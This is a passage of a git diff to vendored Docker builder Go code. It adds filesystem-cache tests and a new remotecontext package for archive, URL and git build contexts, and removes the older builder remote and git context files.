+		GCPolicy: GCPolicy{MaxSize: 15, MaxKeepDuration: time.Hour},
+	}
+
+	fscache, err := NewFSCache(opt)
+	assert.Check(t, err)
+
+	defer fscache.Close()
+
+	err = fscache.RegisterTransport("test", &testTransport{})
+	assert.Check(t, err)
+
+	src1, err := fscache.SyncFrom(context.TODO(), &testIdentifier{"foo", "data", "bar"})
+	assert.Check(t, err)
+
+	dt, err := ioutil.ReadFile(filepath.Join(src1.Root().Path(), "foo"))
+	assert.Check(t, err)
+	assert.Check(t, is.Equal(string(dt), "data"))
+
+	// same id doesn't recalculate anything
+	src2, err := fscache.SyncFrom(context.TODO(), &testIdentifier{"foo", "data2", "bar"})
+	assert.Check(t, err)
+	assert.Check(t, is.Equal(src1.Root().Path(), src2.Root().Path()))
+
+	dt, err = ioutil.ReadFile(filepath.Join(src1.Root().Path(), "foo"))
+	assert.Check(t, err)
+	assert.Check(t, is.Equal(string(dt), "data"))
+	assert.Check(t, src2.Close())
+
+	src3, err := fscache.SyncFrom(context.TODO(), &testIdentifier{"foo2", "data2", "bar"})
+	assert.Check(t, err)
+	assert.Check(t, src1.Root().Path() != src3.Root().Path())
+
+	dt, err = ioutil.ReadFile(filepath.Join(src3.Root().Path(), "foo2"))
+	assert.Check(t, err)
+	assert.Check(t, is.Equal(string(dt), "data2"))
+
+	s, err := fscache.DiskUsage(context.TODO())
+	assert.Check(t, err)
+	assert.Check(t, is.Equal(s, int64(0)))
+
+	assert.Check(t, src3.Close())
+
+	s, err = fscache.DiskUsage(context.TODO())
+	assert.Check(t, err)
+	assert.Check(t, is.Equal(s, int64(5)))
+
+	// new upload with the same shared key shoutl overwrite
+	src4, err := fscache.SyncFrom(context.TODO(), &testIdentifier{"foo3", "data3", "bar"})
+	assert.Check(t, err)
+	assert.Check(t, src1.Root().Path() != src3.Root().Path())
+
+	dt, err = ioutil.ReadFile(filepath.Join(src3.Root().Path(), "foo3"))
+	assert.Check(t, err)
+	assert.Check(t, is.Equal(string(dt), "data3"))
+	assert.Check(t, is.Equal(src4.Root().Path(), src3.Root().Path()))
+	assert.Check(t, src4.Close())
+
+	s, err = fscache.DiskUsage(context.TODO())
+	assert.Check(t, err)
+	assert.Check(t, is.Equal(s, int64(10)))
+
+	// this one goes over the GC limit
+	src5, err := fscache.SyncFrom(context.TODO(), &testIdentifier{"foo4", "datadata", "baz"})
+	assert.Check(t, err)
+	assert.Check(t, src5.Close())
+
+	// GC happens async
+	time.Sleep(100 * time.Millisecond)
+
+	// only last insertion after GC
+	s, err = fscache.DiskUsage(context.TODO())
+	assert.Check(t, err)
+	assert.Check(t, is.Equal(s, int64(8)))
+
+	// prune deletes everything
+	released, err := fscache.Prune(context.TODO())
+	assert.Check(t, err)
+	assert.Check(t, is.Equal(released, uint64(8)))
+
+	s, err = fscache.DiskUsage(context.TODO())
+	assert.Check(t, err)
+	assert.Check(t, is.Equal(s, int64(0)))
+}
+
+type testTransport struct {
+}
+
+func (t *testTransport) Copy(ctx context.Context, id RemoteIdentifier, dest string, cs filesync.CacheUpdater) error {
+	testid := id.(*testIdentifier)
+	return ioutil.WriteFile(filepath.Join(dest, testid.filename), []byte(testid.data), 0600)
+}
+
+type testIdentifier struct {
+	filename  string
+	data      string
+	sharedKey string
+}
+
+func (t *testIdentifier) Key() string {
+	return t.filename
+}
+func (t *testIdentifier) SharedKey() string {
+	return t.sharedKey
+}
+func (t *testIdentifier) Transport() string {
+	return "test"
+}
diff --git a/vendor/github.com/docker/docker/builder/fscache/naivedriver.go b/vendor/github.com/docker/docker/builder/fscache/naivedriver.go
new file mode 100644
index 0000000000..053509aecf
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/fscache/naivedriver.go
@@ -0,0 +1,28 @@
+package fscache // import "github.com/docker/docker/builder/fscache"
+
+import (
+	"os"
+	"path/filepath"
+
+	"github.com/pkg/errors"
+)
+
+// NewNaiveCacheBackend is a basic backend implementation for fscache
+func NewNaiveCacheBackend(root string) Backend {
+	return &naiveCacheBackend{root: root}
+}
+
+type naiveCacheBackend struct {
+	root string
+}
+
+func (tcb *naiveCacheBackend) Get(id string) (string, error) {
+	d := filepath.Join(tcb.root, id)
+	if err := os.MkdirAll(d, 0700); err != nil {
+		return "", errors.Wrapf(err, "failed to create tmp dir for %s", d)
+	}
+	return d, nil
+}
+func (tcb *naiveCacheBackend) Remove(id string) error {
+	return errors.WithStack(os.RemoveAll(filepath.Join(tcb.root, id)))
+}
diff --git a/vendor/github.com/docker/docker/builder/git.go b/vendor/github.com/docker/docker/builder/git.go
deleted file mode 100644
index 74df244611..0000000000
--- a/vendor/github.com/docker/docker/builder/git.go
+++ /dev/null
@@ -1,28 +0,0 @@
-package builder
-
-import (
-	"os"
-
-	"github.com/docker/docker/pkg/archive"
-	"github.com/docker/docker/pkg/gitutils"
-)
-
-// MakeGitContext returns a Context from gitURL that is cloned in a temporary directory.
-func MakeGitContext(gitURL string) (ModifiableContext, error) {
-	root, err := gitutils.Clone(gitURL)
-	if err != nil {
-		return nil, err
-	}
-
-	c, err := archive.Tar(root, archive.Uncompressed)
-	if err != nil {
-		return nil, err
-	}
-
-	defer func() {
-		// TODO: print errors?
-		c.Close()
-		os.RemoveAll(root)
-	}()
-	return MakeTarSumContext(c)
-}
diff --git a/vendor/github.com/docker/docker/builder/remote.go b/vendor/github.com/docker/docker/builder/remote.go
deleted file mode 100644
index f3a4329d16..0000000000
--- a/vendor/github.com/docker/docker/builder/remote.go
+++ /dev/null
@@ -1,157 +0,0 @@
-package builder
-
-import (
-	"bytes"
-	"errors"
-	"fmt"
-	"io"
-	"io/ioutil"
-	"regexp"
-
-	"github.com/docker/docker/pkg/archive"
-	"github.com/docker/docker/pkg/httputils"
-	"github.com/docker/docker/pkg/urlutil"
-)
-
-// When downloading remote contexts, limit the amount (in bytes)
-// to be read from the response body in order to detect its Content-Type
-const maxPreambleLength = 100
-
-const acceptableRemoteMIME = `(?:application/(?:(?:x\-)?tar|octet\-stream|((?:x\-)?(?:gzip|bzip2?|xz)))|(?:text/plain))`
-
-var mimeRe = regexp.MustCompile(acceptableRemoteMIME)
-
-// MakeRemoteContext downloads a context from remoteURL and returns it.
-//
-// If contentTypeHandlers is non-nil, then the Content-Type header is read along with a maximum of
-// maxPreambleLength bytes from the body to help detecting the MIME type.
-// Look at acceptableRemoteMIME for more details.
-//
-// If a match is found, then the body is sent to the contentType handler and a (potentially compressed) tar stream is expected
-// to be returned. If no match is found, it is assumed the body is a tar stream (compressed or not).
-// In either case, an (assumed) tar stream is passed to MakeTarSumContext whose result is returned.
-func MakeRemoteContext(remoteURL string, contentTypeHandlers map[string]func(io.ReadCloser) (io.ReadCloser, error)) (ModifiableContext, error) {
-	f, err := httputils.Download(remoteURL)
-	if err != nil {
-		return nil, fmt.Errorf("error downloading remote context %s: %v", remoteURL, err)
-	}
-	defer f.Body.Close()
-
-	var contextReader io.ReadCloser
-	if contentTypeHandlers != nil {
-		contentType := f.Header.Get("Content-Type")
-		clen := f.ContentLength
-
-		contentType, contextReader, err = inspectResponse(contentType, f.Body, clen)
-		if err != nil {
-			return nil, fmt.Errorf("error detecting content type for remote %s: %v", remoteURL, err)
-		}
-		defer contextReader.Close()
-
-		// This loop tries to find a content-type handler for the detected content-type.
-		// If it could not find one from the caller-supplied map, it tries the empty content-type `""`
-		// which is interpreted as a fallback handler (usually used for raw tar contexts).
-		for _, ct := range []string{contentType, ""} {
-			if fn, ok := contentTypeHandlers[ct]; ok {
-				defer contextReader.Close()
-				if contextReader, err = fn(contextReader); err != nil {
-					return nil, err
-				}
-				break
-			}
-		}
-	}
-
-	// Pass through - this is a pre-packaged context, presumably
-	// with a Dockerfile with the right name inside it.
-	return MakeTarSumContext(contextReader)
-}
-
-// DetectContextFromRemoteURL returns a context and in certain cases the name of the dockerfile to be used
-// irrespective of user input.
-// progressReader is only used if remoteURL is actually a URL (not empty, and not a Git endpoint).
-func DetectContextFromRemoteURL(r io.ReadCloser, remoteURL string, createProgressReader func(in io.ReadCloser) io.ReadCloser) (context ModifiableContext, dockerfileName string, err error) {
-	switch {
-	case remoteURL == "":
-		context, err = MakeTarSumContext(r)
-	case urlutil.IsGitURL(remoteURL):
-		context, err = MakeGitContext(remoteURL)
-	case urlutil.IsURL(remoteURL):
-		context, err = MakeRemoteContext(remoteURL, map[string]func(io.ReadCloser) (io.ReadCloser, error){
-			httputils.MimeTypes.TextPlain: func(rc io.ReadCloser) (io.ReadCloser, error) {
-				dockerfile, err := ioutil.ReadAll(rc)
-				if err != nil {
-					return nil, err
-				}
-
-				// dockerfileName is set to signal that the remote was interpreted as a single Dockerfile, in which case the caller
-				// should use dockerfileName as the new name for the Dockerfile, irrespective of any other user input.
-				dockerfileName = DefaultDockerfileName
-
-				// TODO: return a context without tarsum
-				r, err := archive.Generate(dockerfileName, string(dockerfile))
-				if err != nil {
-					return nil, err
-				}
-
-				return ioutil.NopCloser(r), nil
-			},
-			// fallback handler (tar context)
-			"": func(rc io.ReadCloser) (io.ReadCloser, error) {
-				return createProgressReader(rc), nil
-			},
-		})
-	default:
-		err = fmt.Errorf("remoteURL (%s) could not be recognized as URL", remoteURL)
-	}
-	return
-}
-
-// inspectResponse looks into the http response data at r to determine whether its
-// content-type is on the list of acceptable content types for remote build contexts.
-// This function returns:
-//    - a string representation of the detected content-type
-//    - an io.Reader for the response body
-//    - an error value which will be non-nil either when something goes wrong while
-//      reading bytes from r or when the detected content-type is not acceptable.
-func inspectResponse(ct string, r io.ReadCloser, clen int64) (string, io.ReadCloser, error) {
-	plen := clen
-	if plen <= 0 || plen > maxPreambleLength {
-		plen = maxPreambleLength
-	}
-
-	preamble := make([]byte, plen, plen)
-	rlen, err := r.Read(preamble)
-	if rlen == 0 {
-		return ct, r, errors.New("empty response")
-	}
-	if err != nil && err != io.EOF {
-		return ct, r, err
-	}
-
-	preambleR := bytes.NewReader(preamble)
-	bodyReader := ioutil.NopCloser(io.MultiReader(preambleR, r))
-	// Some web servers will use application/octet-stream as the default
-	// content type for files without an extension (e.g. 'Dockerfile')
-	// so if we receive this value we better check for text content
-	contentType := ct
-	if len(ct) == 0 || ct == httputils.MimeTypes.OctetStream {
-		contentType, _, err = httputils.DetectContentType(preamble)
-		if err != nil {
-			return contentType, bodyReader, err
-		}
-	}
-
-	contentType = selectAcceptableMIME(contentType)
-	var cterr error
-	if len(contentType) == 0 {
-		cterr = fmt.Errorf("unsupported Content-Type %q", ct)
-		contentType = ct
-	}
-
-	return contentType, bodyReader, cterr
-}
-
-func selectAcceptableMIME(ct string) string {
-	return mimeRe.FindString(ct)
-}
diff --git a/vendor/github.com/docker/docker/builder/remotecontext/archive.go b/vendor/github.com/docker/docker/builder/remotecontext/archive.go
new file mode 100644
index 0000000000..6d247f945d
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/remotecontext/archive.go
@@ -0,0 +1,125 @@
+package remotecontext // import "github.com/docker/docker/builder/remotecontext"
+
+import (
+	"io"
+	"os"
+	"path/filepath"
+
+	"github.com/docker/docker/builder"
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/chrootarchive"
+	"github.com/docker/docker/pkg/containerfs"
+	"github.com/docker/docker/pkg/ioutils"
+	"github.com/docker/docker/pkg/tarsum"
+	"github.com/pkg/errors"
+)
+
+type archiveContext struct {
+	root containerfs.ContainerFS
+	sums tarsum.FileInfoSums
+}
+
+func (c *archiveContext) Close() error {
+	return c.root.RemoveAll(c.root.Path())
+}
+
+func convertPathError(err error, cleanpath string) error {
+	if err, ok := err.(*os.PathError); ok {
+		err.Path = cleanpath
+		return err
+	}
+	return err
+}
+
+type modifiableContext interface {
+	builder.Source
+	// Remove deletes the entry specified by `path`.
+	// It is usual for directory entries to delete all its subentries.
+	Remove(path string) error
+}
+
+// FromArchive returns a build source from a tar stream.
+//
+// It extracts the tar stream to a temporary folder that is deleted as soon as
+// the Context is closed.
+// As the extraction happens, a tarsum is calculated for every file, and the set of
+// all those sums then becomes the source of truth for all operations on this Context.
+//
+// Closing tarStream has to be done by the caller.
+func FromArchive(tarStream io.Reader) (builder.Source, error) {
+	root, err := ioutils.TempDir("", "docker-builder")
+	if err != nil {
+		return nil, err
+	}
+
+	// Assume local file system. Since it's coming from a tar file.
+	tsc := &archiveContext{root: containerfs.NewLocalContainerFS(root)}
+
+	// Make sure we clean-up upon error.  In the happy case the caller
+	// is expected to manage the clean-up
+	defer func() {
+		if err != nil {
+			tsc.Close()
+		}
+	}()
+
+	decompressedStream, err := archive.DecompressStream(tarStream)
+	if err != nil {
+		return nil, err
+	}
+
+	sum, err := tarsum.NewTarSum(decompressedStream, true, tarsum.Version1)
+	if err != nil {
+		return nil, err
+	}
+
+	err = chrootarchive.Untar(sum, root, nil)
+	if err != nil {
+		return nil, err
+	}
+
+	tsc.sums = sum.GetSums()
+	return tsc, nil
+}
+
+func (c *archiveContext) Root() containerfs.ContainerFS {
+	return c.root
+}
+
+func (c *archiveContext) Remove(path string) error {
+	_, fullpath, err := normalize(path, c.root)
+	if err != nil {
+		return err
+	}
+	return c.root.RemoveAll(fullpath)
+}
+
+func (c *archiveContext) Hash(path string) (string, error) {
+	cleanpath, fullpath, err := normalize(path, c.root)
+	if err != nil {
+		return "", err
+	}
+
+	rel, err := c.root.Rel(c.root.Path(), fullpath)
+	if err != nil {
+		return "", convertPathError(err, cleanpath)
+	}
+
+	// Use the checksum of the followed path(not the possible symlink) because
+	// this is the file that is actually copied.
+	if tsInfo := c.sums.GetFile(filepath.ToSlash(rel)); tsInfo != nil {
+		return tsInfo.Sum(), nil
+	}
+	// We set sum to path by default for the case where GetFile returns nil.
+	// The usual case is if relative path is empty.
+	return path, nil // backwards compat TODO: see if really needed
+}
+
+func normalize(path string, root containerfs.ContainerFS) (cleanPath, fullPath string, err error) {
+	cleanPath = root.Clean(string(root.Separator()) + path)[1:]
+	fullPath, err = root.ResolveScopedPath(path, true)
+	if err != nil {
+		return "", "", errors.Wrapf(err, "forbidden path outside the build context: %s (%s)", path, cleanPath)
+	}
+	return
+}
diff --git a/vendor/github.com/docker/docker/builder/remotecontext/detect.go b/vendor/github.com/docker/docker/builder/remotecontext/detect.go
new file mode 100644
index 0000000000..aaace269e9
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/remotecontext/detect.go
@@ -0,0 +1,180 @@
+package remotecontext // import "github.com/docker/docker/builder/remotecontext"
+
+import (
+	"bufio"
+	"fmt"
+	"io"
+	"os"
+	"strings"
+
+	"github.com/containerd/continuity/driver"
+	"github.com/docker/docker/api/types/backend"
+	"github.com/docker/docker/builder"
+	"github.com/docker/docker/builder/dockerignore"
+	"github.com/docker/docker/pkg/fileutils"
+	"github.com/docker/docker/pkg/urlutil"
+	"github.com/moby/buildkit/frontend/dockerfile/parser"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
+)
+
+// ClientSessionRemote is identifier for client-session context transport
+const ClientSessionRemote = "client-session"
+
+// Detect returns a context and dockerfile from remote location or local
+// archive. progressReader is only used if remoteURL is actually a URL
+// (not empty, and not a Git endpoint).
+func Detect(config backend.BuildConfig) (remote builder.Source, dockerfile *parser.Result, err error) {
+	remoteURL := config.Options.RemoteContext
+	dockerfilePath := config.Options.Dockerfile
+
+	switch {
+	case remoteURL == "":
+		remote, dockerfile, err = newArchiveRemote(config.Source, dockerfilePath)
+	case remoteURL == ClientSessionRemote:
+		res, err := parser.Parse(config.Source)
+		if err != nil {
+			return nil, nil, err
+		}
+		return nil, res, nil
+	case urlutil.IsGitURL(remoteURL):
+		remote, dockerfile, err = newGitRemote(remoteURL, dockerfilePath)
+	case urlutil.IsURL(remoteURL):
+		remote, dockerfile, err = newURLRemote(remoteURL, dockerfilePath, config.ProgressWriter.ProgressReaderFunc)
+	default:
+		err = fmt.Errorf("remoteURL (%s) could not be recognized as URL", remoteURL)
+	}
+	return
+}
+
+func newArchiveRemote(rc io.ReadCloser, dockerfilePath string) (builder.Source, *parser.Result, error) {
+	defer rc.Close()
+	c, err := FromArchive(rc)
+	if err != nil {
+		return nil, nil, err
+	}
+
+	return withDockerfileFromContext(c.(modifiableContext), dockerfilePath)
+}
+
+func withDockerfileFromContext(c modifiableContext, dockerfilePath string) (builder.Source, *parser.Result, error) {
+	df, err := openAt(c, dockerfilePath)
+	if err != nil {
+		if os.IsNotExist(err) {
+			if dockerfilePath == builder.DefaultDockerfileName {
+				lowercase := strings.ToLower(dockerfilePath)
+				if _, err := StatAt(c, lowercase); err == nil {
+					return withDockerfileFromContext(c, lowercase)
+				}
+			}
+			return nil, nil, errors.Errorf("Cannot locate specified Dockerfile: %s", dockerfilePath) // backwards compatible error
+		}
+		c.Close()
+		return nil, nil, err
+	}
+
+	res, err := readAndParseDockerfile(dockerfilePath, df)
+	if err != nil {
+		return nil, nil, err
+	}
+
+	df.Close()
+
+	if err := removeDockerfile(c, dockerfilePath); err != nil {
+		c.Close()
+		return nil, nil, err
+	}
+
+	return c, res, nil
+}
+
+func newGitRemote(gitURL string, dockerfilePath string) (builder.Source, *parser.Result, error) {
+	c, err := MakeGitContext(gitURL) // TODO: change this to NewLazySource
+	if err != nil {
+		return nil, nil, err
+	}
+	return withDockerfileFromContext(c.(modifiableContext), dockerfilePath)
+}
+
+func newURLRemote(url string, dockerfilePath string, progressReader func(in io.ReadCloser) io.ReadCloser) (builder.Source, *parser.Result, error) {
+	contentType, content, err := downloadRemote(url)
+	if err != nil {
+		return nil, nil, err
+	}
+	defer content.Close()
+
+	switch contentType {
+	case mimeTypes.TextPlain:
+		res, err := parser.Parse(progressReader(content))
+		return nil, res, err
+	default:
+		source, err := FromArchive(progressReader(content))
+		if err != nil {
+			return nil, nil, err
+		}
+		return withDockerfileFromContext(source.(modifiableContext), dockerfilePath)
+	}
+}
+
+func removeDockerfile(c modifiableContext, filesToRemove ...string) error {
+	f, err := openAt(c, ".dockerignore")
+	// Note that a missing .dockerignore file isn't treated as an error
+	switch {
+	case os.IsNotExist(err):
+		return nil
+	case err != nil:
+		return err
+	}
+	excludes, err := dockerignore.ReadAll(f)
+	if err != nil {
+		f.Close()
+		return err
+	}
+	f.Close()
+	filesToRemove = append([]string{".dockerignore"}, filesToRemove...)
+	for _, fileToRemove := range filesToRemove {
+		if rm, _ := fileutils.Matches(fileToRemove, excludes); rm {
+			if err := c.Remove(fileToRemove); err != nil {
+				logrus.Errorf("failed to remove %s: %v", fileToRemove, err)
+			}
+		}
+	}
+	return nil
+}
+
+func readAndParseDockerfile(name string, rc io.Reader) (*parser.Result, error) {
+	br := bufio.NewReader(rc)
+	if _, err := br.Peek(1); err != nil {
+		if err == io.EOF {
+			return nil, errors.Errorf("the Dockerfile (%s) cannot be empty", name)
+		}
+		return nil, errors.Wrap(err, "unexpected error reading Dockerfile")
+	}
+	return parser.Parse(br)
+}
+
+func openAt(remote builder.Source, path string) (driver.File, error) {
+	fullPath, err := FullPath(remote, path)
+	if err != nil {
+		return nil, err
+	}
+	return remote.Root().Open(fullPath)
+}
+
+// StatAt is a helper for calling Stat on a path from a source
+func StatAt(remote builder.Source, path string) (os.FileInfo, error) {
+	fullPath, err := FullPath(remote, path)
+	if err != nil {
+		return nil, err
+	}
+	return remote.Root().Stat(fullPath)
+}
+
+// FullPath is a helper for getting a full path for a path from a source
+func FullPath(remote builder.Source, path string) (string, error) {
+	fullPath, err := remote.Root().ResolveScopedPath(path, true)
+	if err != nil {
+		return "", fmt.Errorf("Forbidden path outside the build context: %s (%s)", path, fullPath) // backwards compat with old error
+	}
+	return fullPath, nil
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerignore_test.go b/vendor/github.com/docker/docker/builder/remotecontext/detect_test.go
similarity index 58%
rename from vendor/github.com/docker/docker/builder/dockerignore_test.go
rename to vendor/github.com/docker/docker/builder/remotecontext/detect_test.go
index 3c0ceda4cf..04b7686c7a 100644
--- a/vendor/github.com/docker/docker/builder/dockerignore_test.go
+++ b/vendor/github.com/docker/docker/builder/remotecontext/detect_test.go
@@ -1,17 +1,27 @@
-package builder
+package remotecontext // import "github.com/docker/docker/builder/remotecontext"
 
 import (
+	"errors"
 	"io/ioutil"
 	"log"
 	"os"
 	"sort"
 	"testing"
+
+	"github.com/docker/docker/builder"
+	"github.com/docker/docker/pkg/containerfs"
+)
+
+const (
+	dockerfileContents   = "FROM busybox"
+	dockerignoreFilename = ".dockerignore"
+	testfileContents     = "test"
 )
 
 const shouldStayFilename = "should_stay"
 
 func extractFilenames(files []os.FileInfo) []string {
-	filenames := make([]string, len(files), len(files))
+	filenames := make([]string, len(files))
 
 	for i, file := range files {
 		filenames[i] = file.Name()
@@ -43,10 +53,9 @@ func checkDirectory(t *testing.T, dir string, expectedFiles []string) {
 }
 
 func executeProcess(t *testing.T, contextDir string) {
-	modifiableCtx := &tarSumContext{root: contextDir}
-	ctx := DockerIgnoreContext{ModifiableContext: modifiableCtx}
+	modifiableCtx := &stubRemote{root: containerfs.NewLocalContainerFS(contextDir)}
 
-	err := ctx.Process([]string{DefaultDockerfileName})
+	err := removeDockerfile(modifiableCtx, builder.DefaultDockerfileName)
 
 	if err != nil {
 		t.Fatalf("Error when executing Process: %s", err)
@@ -59,7 +68,7 @@ func TestProcessShouldRemoveDockerfileDockerignore(t *testing.T) {
 
 	createTestTempFile(t, contextDir, shouldStayFilename, testfileContents, 0777)
 	createTestTempFile(t, contextDir, dockerignoreFilename, "Dockerfile\n.dockerignore", 0777)
-	createTestTempFile(t, contextDir, DefaultDockerfileName, dockerfileContents, 0777)
+	createTestTempFile(t, contextDir, builder.DefaultDockerfileName, dockerfileContents, 0777)
 
 	executeProcess(t, contextDir)
 
@@ -72,11 +81,11 @@ func TestProcessNoDockerignore(t *testing.T) {
 	defer cleanup()
 
 	createTestTempFile(t, contextDir, shouldStayFilename, testfileContents, 0777)
-	createTestTempFile(t, contextDir, DefaultDockerfileName, dockerfileContents, 0777)
+	createTestTempFile(t, contextDir, builder.DefaultDockerfileName, dockerfileContents, 0777)
 
 	executeProcess(t, contextDir)
 
-	checkDirectory(t, contextDir, []string{shouldStayFilename, DefaultDockerfileName})
+	checkDirectory(t, contextDir, []string{shouldStayFilename, builder.DefaultDockerfileName})
 
 }
 
@@ -85,11 +94,30 @@ func TestProcessShouldLeaveAllFiles(t *testing.T) {
 	defer cleanup()
 
 	createTestTempFile(t, contextDir, shouldStayFilename, testfileContents, 0777)
-	createTestTempFile(t, contextDir, DefaultDockerfileName, dockerfileContents, 0777)
+	createTestTempFile(t, contextDir, builder.DefaultDockerfileName, dockerfileContents, 0777)
 	createTestTempFile(t, contextDir, dockerignoreFilename, "input1\ninput2", 0777)
 
 	executeProcess(t, contextDir)
 
-	checkDirectory(t, contextDir, []string{shouldStayFilename, DefaultDockerfileName, dockerignoreFilename})
+	checkDirectory(t, contextDir, []string{shouldStayFilename, builder.DefaultDockerfileName, dockerignoreFilename})
 
 }
+
+// TODO: remove after moving to a separate pkg
+type stubRemote struct {
+	root containerfs.ContainerFS
+}
+
+func (r *stubRemote) Hash(path string) (string, error) {
+	return "", errors.New("not implemented")
+}
+
+func (r *stubRemote) Root() containerfs.ContainerFS {
+	return r.root
+}
+func (r *stubRemote) Close() error {
+	return errors.New("not implemented")
+}
+func (r *stubRemote) Remove(p string) error {
+	return r.root.Remove(r.root.Join(r.root.Path(), p))
+}
diff --git a/vendor/github.com/docker/docker/builder/remotecontext/filehash.go b/vendor/github.com/docker/docker/builder/remotecontext/filehash.go
new file mode 100644
index 0000000000..3565dd8279
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/remotecontext/filehash.go
@@ -0,0 +1,45 @@
+package remotecontext // import "github.com/docker/docker/builder/remotecontext"
+
+import (
+	"archive/tar"
+	"crypto/sha256"
+	"hash"
+	"os"
+
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/tarsum"
+)
+
+// NewFileHash returns new hash that is used for the builder cache keys
+func NewFileHash(path, name string, fi os.FileInfo) (hash.Hash, error) {
+	var link string
+	if fi.Mode()&os.ModeSymlink != 0 {
+		var err error
+		link, err = os.Readlink(path)
+		if err != nil {
+			return nil, err
+		}
+	}
+	hdr, err := archive.FileInfoHeader(name, fi, link)
+	if err != nil {
+		return nil, err
+	}
+	if err := archive.ReadSecurityXattrToTarHeader(path, hdr); err != nil {
+		return nil, err
+	}
+	tsh := &tarsumHash{hdr: hdr, Hash: sha256.New()}
+	tsh.Reset() // initialize header
+	return tsh, nil
+}
+
+type tarsumHash struct {
+	hash.Hash
+	hdr *tar.Header
+}
+
+// Reset resets the Hash to its initial state.
+func (tsh *tarsumHash) Reset() {
+	// comply with hash.Hash and reset to the state hash had before any writes
+	tsh.Hash.Reset()
+	tarsum.WriteV1Header(tsh.hdr, tsh.Hash)
+}
diff --git a/vendor/github.com/docker/docker/builder/remotecontext/generate.go b/vendor/github.com/docker/docker/builder/remotecontext/generate.go
new file mode 100644
index 0000000000..84c1b3b5ea
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/remotecontext/generate.go
@@ -0,0 +1,3 @@
+package remotecontext // import "github.com/docker/docker/builder/remotecontext"
+
+//go:generate protoc --gogoslick_out=. tarsum.proto
diff --git a/vendor/github.com/docker/docker/builder/remotecontext/git.go b/vendor/github.com/docker/docker/builder/remotecontext/git.go
new file mode 100644
index 0000000000..1583ca28d0
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/remotecontext/git.go
@@ -0,0 +1,35 @@
+package remotecontext // import "github.com/docker/docker/builder/remotecontext"
+
+import (
+	"os"
+
+	"github.com/docker/docker/builder"
+	"github.com/docker/docker/builder/remotecontext/git"
+	"github.com/docker/docker/pkg/archive"
+	"github.com/sirupsen/logrus"
+)
+
+// MakeGitContext returns a Context from gitURL that is cloned in a temporary directory.
+func MakeGitContext(gitURL string) (builder.Source, error) {
+	root, err := git.Clone(gitURL)
+	if err != nil {
+		return nil, err
+	}
+
+	c, err := archive.Tar(root, archive.Uncompressed)
+	if err != nil {
+		return nil, err
+	}
+
+	defer func() {
+		err := c.Close()
+		if err != nil {
+			logrus.WithField("action", "MakeGitContext").WithField("module", "builder").WithField("url", gitURL).WithError(err).Error("error while closing git context")
+		}
+		err = os.RemoveAll(root)
+		if err != nil {
+			logrus.WithField("action", "MakeGitContext").WithField("module", "builder").WithField("url", gitURL).WithError(err).Error("error while removing path and children of root")
+		}
+	}()
+	return FromArchive(c)
+}
diff --git a/vendor/github.com/docker/docker/builder/remotecontext/git/gitutils.go b/vendor/github.com/docker/docker/builder/remotecontext/git/gitutils.go
new file mode 100644
index 0000000000..77a45beff3
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/remotecontext/git/gitutils.go
@@ -0,0 +1,204 @@
+package git // import "github.com/docker/docker/builder/remotecontext/git"
+
+import (
+	"io/ioutil"
+	"net/http"
+	"net/url"
+	"os"
+	"os/exec"
+	"path/filepath"
+	"strings"
+
+	"github.com/docker/docker/pkg/symlink"
+	"github.com/docker/docker/pkg/urlutil"
+	"github.com/pkg/errors"
+)
+
+type gitRepo struct {
+	remote string
+	ref    string
+	subdir string
+}
+
+// Clone clones a repository into a newly created directory which
+// will be under "docker-build-git"
+func Clone(remoteURL string) (string, error) {
+	repo, err := parseRemoteURL(remoteURL)
+
+	if err != nil {
+		return "", err
+	}
+
+	return cloneGitRepo(repo)
+}
+
+func cloneGitRepo(repo gitRepo) (checkoutDir string, err error) {
+	fetch := fetchArgs(repo.remote, repo.ref)
+
+	root, err := ioutil.TempDir("", "docker-build-git")
+	if err != nil {
+		return "", err
+	}
+
+	defer func() {
+		if err != nil {
+			os.RemoveAll(root)
+		}
+	}()
+
+	if out, err := gitWithinDir(root, "init"); err != nil {
+		return "", errors.Wrapf(err, "failed to init repo at %s: %s", root, out)
+	}
+
+	// Add origin remote for compatibility with previous implementation that
+	// used "git clone" and also to make sure local refs are created for branches
+	if out, err := gitWithinDir(root, "remote", "add", "origin", repo.remote); err != nil {
+		return "", errors.Wrapf(err, "failed add origin repo at %s: %s", repo.remote, out)
+	}
+
+	if output, err := gitWithinDir(root, fetch...); err != nil {
+		return "", errors.Wrapf(err, "error fetching: %s", output)
+	}
+
+	checkoutDir, err = checkoutGit(root, repo.ref, repo.subdir)
+	if err != nil {
+		return "", err
+	}
+
+	cmd := exec.Command("git", "submodule", "update", "--init", "--recursive", "--depth=1")
+	cmd.Dir = root
+	output, err := cmd.CombinedOutput()
+	if err != nil {
+		return "", errors.Wrapf(err, "error initializing submodules: %s", output)
+	}
+
+	return checkoutDir, nil
+}
+
+func parseRemoteURL(remoteURL string) (gitRepo, error) {
+	repo := gitRepo{}
+
+	if !isGitTransport(remoteURL) {
+		remoteURL = "https://" + remoteURL
+	}
+
+	var fragment string
+	if strings.HasPrefix(remoteURL, "git@") {
+		// git@.. is not an URL, so cannot be parsed as URL
+		parts := strings.SplitN(remoteURL, "#", 2)
+
+		repo.remote = parts[0]
+		if len(parts) == 2 {
+			fragment = parts[1]
+		}
+		repo.ref, repo.subdir = getRefAndSubdir(fragment)
+	} else {
+		u, err := url.Parse(remoteURL)
+		if err != nil {
+			return repo, err
+		}
+
+		repo.ref, repo.subdir = getRefAndSubdir(u.Fragment)
+		u.Fragment = ""
+		repo.remote = u.String()
+	}
+	return repo, nil
+}
+
+func getRefAndSubdir(fragment string) (ref string, subdir string) {
+	refAndDir := strings.SplitN(fragment, ":", 2)
+	ref = "master"
+	if len(refAndDir[0]) != 0 {
+		ref = refAndDir[0]
+	}
+	if len(refAndDir) > 1 && len(refAndDir[1]) != 0 {
+		subdir = refAndDir[1]
+	}
+	return
+}
+
+func fetchArgs(remoteURL string, ref string) []string {
+	args := []string{"fetch"}
+
+	if supportsShallowClone(remoteURL) {
